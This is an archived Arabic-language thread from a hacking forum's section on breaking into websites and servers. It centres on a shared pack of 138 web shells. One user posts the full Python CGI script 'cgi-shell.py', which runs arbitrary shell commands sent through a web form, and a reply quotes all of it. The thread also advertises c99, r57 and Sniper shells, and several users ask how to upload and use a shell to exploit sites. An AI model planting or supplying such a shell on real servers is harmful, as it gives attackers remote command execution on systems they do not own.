:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   لا تستفسر عن الشل بعد اليوم كل شي واكثر+138 شل +شرح صوت وصوره (http://www.vbspiders.com/vb/t19386.html)

TETMOR 10-11-2009 07:13 PM

MEEEEEEEEEEEEEEEEEEEEEEEERCI

HORN 10-19-2009 05:12 PM

السلام
اولن مشكوووووووووووووور علا هاذا الشرح

ثانين ابي اعرف هاذا هو الشيل



#!/usr/bin/python
# 07-07-04
# v1.0.0

# cgi-shell.py
# A simple CGI that executes arbitrary shell commands.


# Copyright Michael Foord
# You are free to modify, use and relicense this code.

# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!

# E-mail michael AT foord DOT me DOT uk
# Maintained at http://www.voidspace.org.uk/atlantib...thonutils.html

"""
A simple CGI script to execute shell commands via CGI.
"""
################################################## ##############
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os
sys.stderr = sys.stdout
from time import strftime
import traceback
from StringIO import StringIO
from traceback import print_exc

################################################## ##############
# constants

fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
versionstring = 'Version 1.0.0 7th July 2004'

if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
else:
scriptname = ""

METHOD = '"POST"'

################################################## ##############
# Private functions and variables

def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data


theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
<BODY><CENTER>
<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'

theform = """<H2>Enter Command</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
<input name=cmd type=text><BR>
<input type=submit value="Submit"><BR>
</FORM><BR><BR>"""
bodyend = '</BODY></HTML>'
errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'

################################################## ##############
# main body of the script

if __name__ == '__main__':
print "*******-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['cmd'],form)
thecmd = data['cmd']
print theformhead
print theform
if thecmd:
print '<HR><BR><BR>'
print '<B>Command : ', thecmd, '<BR><BR>'
print 'Result : <BR><BR>'
try:
child_stdin, child_stdout = os.popen2(thecmd)
child_stdin.close()
result = child_stdout.read()
child_stdout.close()
print result.replace('\n', '<BR>')

except Exception, e: # an error in executing the command
print errormess
f = StringIO()
print_exc(file=f)
a = f.getvalue().splitlines()
for line in a:
print line

print bodyend


"""
TODO/ISSUES



CHANGELOG

07-07-04 Version 1.0.0
A very basic system for executing shell commands.
I may expand it into a proper 'environment' with session persistence...
"""




ولا لا


وذا كان مهو هو ابي تعطيني شيلc99


بلز

KaLa$nikoV 10-19-2009 07:23 PM

اقتباس:

المشاركة الأصلية كتبت بواسطة HORN (المشاركة 74263)
السلام
اولن مشكوووووووووووووور علا هاذا الشرح

ثانين ابي اعرف هاذا هو الشيل



#!/usr/bin/python
# 07-07-04
# v1.0.0

# cgi-shell.py
# A simple CGI that executes arbitrary shell commands.


# Copyright Michael Foord
# You are free to modify, use and relicense this code.

# No warranty express or implied for the accuracy, fitness to purpose or otherwise for this code....
# Use at your own risk !!!

# E-mail michael AT foord DOT me DOT uk
# Maintained at www.voidspace.org.uk/atlantibots/pythonutils.html

"""
A simple CGI script to execute shell commands via CGI.
"""
################################################## ##############
# Imports
try:
import cgitb; cgitb.enable()
except:
pass
import sys, cgi, os
sys.stderr = sys.stdout
from time import strftime
import traceback
from StringIO import StringIO
from traceback import print_exc

################################################## ##############
# constants

fontline = '<FONT COLOR=#424242 style="font-family:times;font-size:12pt;">'
versionstring = 'Version 1.0.0 7th July 2004'

if os.environ.has_key("SCRIPT_NAME"):
scriptname = os.environ["SCRIPT_NAME"]
else:
scriptname = ""

METHOD = '"POST"'

################################################## ##############
# Private functions and variables

def getform(valuelist, theform, notpresent=''):
"""This function, given a CGI form, extracts the data from it, based on
valuelist passed in. Any non-present values are set to '' - although this can be changed.
(e.g. to return None so you can test for missing keywords - where '' is a valid answer but to have the field missing isn't.)"""
data = {}
for field in valuelist:
if not theform.has_key(field):
data[field] = notpresent
else:
if type(theform[field]) != type([]):
data[field] = theform[field].value
else:
values = map(lambda x: x.value, theform[field]) # allows for list type values
data[field] = values
return data


theformhead = """<HTML><HEAD><TITLE>cgi-shell.py - a CGI by Fuzzyman</TITLE></HEAD>
<BODY><CENTER>
<H1>Welcome to cgi-shell.py - <BR>a Python CGI</H1>
<B><I>By Fuzzyman</B></I><BR>
"""+fontline +"Version : " + versionstring + """, Running on : """ + strftime('%I:%M %p, %A %d %B, %Y')+'.</CENTER><BR>'

theform = """<H2>Enter Command</H2>
<FORM METHOD=\"""" + METHOD + '" action="' + scriptname + """\">
<input name=cmd type=text><BR>
<input type=submit value="Submit"><BR>
</FORM><BR><BR>"""
bodyend = '</BODY></HTML>'
errormess = '<CENTER><H2>Something Went Wrong</H2><BR><PRE>'

################################################## ##############
# main body of the script

if __name__ == '__main__':
print "*******-type: text/html" # this is the header to the server
print # so is this blank line
form = cgi.FieldStorage()
data = getform(['cmd'],form)
thecmd = data['cmd']
print theformhead
print theform
if thecmd:
print '<HR><BR><BR>'
print '<B>Command : ', thecmd, '<BR><BR>'
print 'Result : <BR><BR>'
try:
child_stdin, child_stdout = os.popen2(thecmd)
child_stdin.close()
result = child_stdout.read()
child_stdout.close()
print result.replace('\n', '<BR>')

except Exception, e: # an error in executing the command
print errormess
f = StringIO()
print_exc(file=f)
a = f.getvalue().splitlines()
for line in a:
print line

print bodyend


"""
TODO/ISSUES



CHANGELOG

07-07-04 Version 1.0.0
A very basic system for executing shell commands.
I may expand it into a proper 'environment' with session persistence...
"""




ولا لا


وذا كان مهو هو ابي تعطيني شيلc99


بلز



1- هذا سكربت مكتوب بلغه برمجيه تدعى البايثون ومعلوماتي فيها صفر اي لا اعرف عنها شيء
2- هناك قسم خاص للاسفتسارات
3-قبل الاستفسار شاهد مواضيع الادوات (بالنسبه لطلبك شل c99(

المزيد من المعلومات

::شيــل c99 مطور ومقوي :::

[ تـطوير قوي جدا لشيل c99 ادخل ولن تندم ]


اقوى شلات الاختراق...R57 - C99 - Sniper ...


مكتبه كامله لكل ادوات اختراق المواقع والسيرفرات


شل c99بانواع الامتدادات جميل


لتحميل 138 شل مقدمه من volcano


اتمنا زي ما خدمتك تخدمني وتواصل نشاطك بالمنتدى ولا اري اي مقابل اخر

Dr.BiLLi-HaCkEr 11-10-2009 03:21 PM

تسلم شرح وافي تحياتي

oOo لــــوكــــ oOo 11-10-2009 05:11 PM

123123
 
الله يعطيك مليون عافيه خيو
ماقصرت
وان شاء الله نستفيد من خبرتك
تحياتي

CrAzy-HaCkEr 11-11-2009 06:17 PM

السلام عليكم
بارك الله فيك أخي الكريم على موضوعك القيم
تحياتي

XxTQxX 11-11-2009 10:06 PM

يعطيك الف عافيه على المجهود الروعه

emad2007 11-16-2009 04:33 AM

شكرا لك اخي مجهود رائع واكتر من رائع بس ياريت تعلمنا بشرح مفصل للمبتدئين كيف يستخدم الشل وكيف يرفعه لانو كدا ماحد يستفيد لانو ماشفت ولا موقع عربي بيشرح بالتفصيل الممل نريد شرح فيديو كيفية الرفع وكيفيه استخدام الشل وارجو ان تتقبل مروري

mohammed saud 11-26-2009 04:04 AM

السلام عليكم
الله يعطيك العافية على الشرح بس بعض الروابط لا تعمل

::شيــل c99 مطور ومقوي :::

[ تـطوير قوي جدا لشيل c99 ادخل ولن تندم ]


اقوى شلات الاختراق...R57 - C99 - Sniper ...


مكتبه كامله لكل ادوات اختراق المواقع والسيرفرات


شل c99بانواع الامتدادات جميل ‏
وشكراااااااااااا

data$hack 12-13-2009 08:23 PM

بارك الله فيك

simokola 01-03-2010 09:04 PM

شكراااااااااااا كثيرااااااااا يا لآخ volcano
الله إزيدك للأنك داءما تريد الخير لكل المسلمين
الله يعطيك الخير وعلى دورتك الجميلة و كل الدروس التي قدمتها
وعلى حلوة الصوت
شكرا مجددا

mecone 02-08-2010 10:24 PM

[align=center]السلام عليكم ورحمة الله وبركاته ممكن طريقت إستخدام شل في عمليت الإستغلال ؟؟[/align]

Dr.NaNo 02-09-2010 12:50 PM

شـكــ وبارك الله فيك ـــرا لك ... لك مني أجمل تحية .

blablabou94 02-12-2010 10:59 PM

شكرا يا أخي العزيز إنتي لمعالم يا ريتني أصبح كيفك في الهاكر

samir01 02-13-2010 04:37 PM

مشكور ياغالي تسلم يابطل موضوع جميل جدا
ان شاء الله للمزيد من التقدم يارب ننتضر جديدك بفارغ الصبر


الساعة الآن 12:33 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0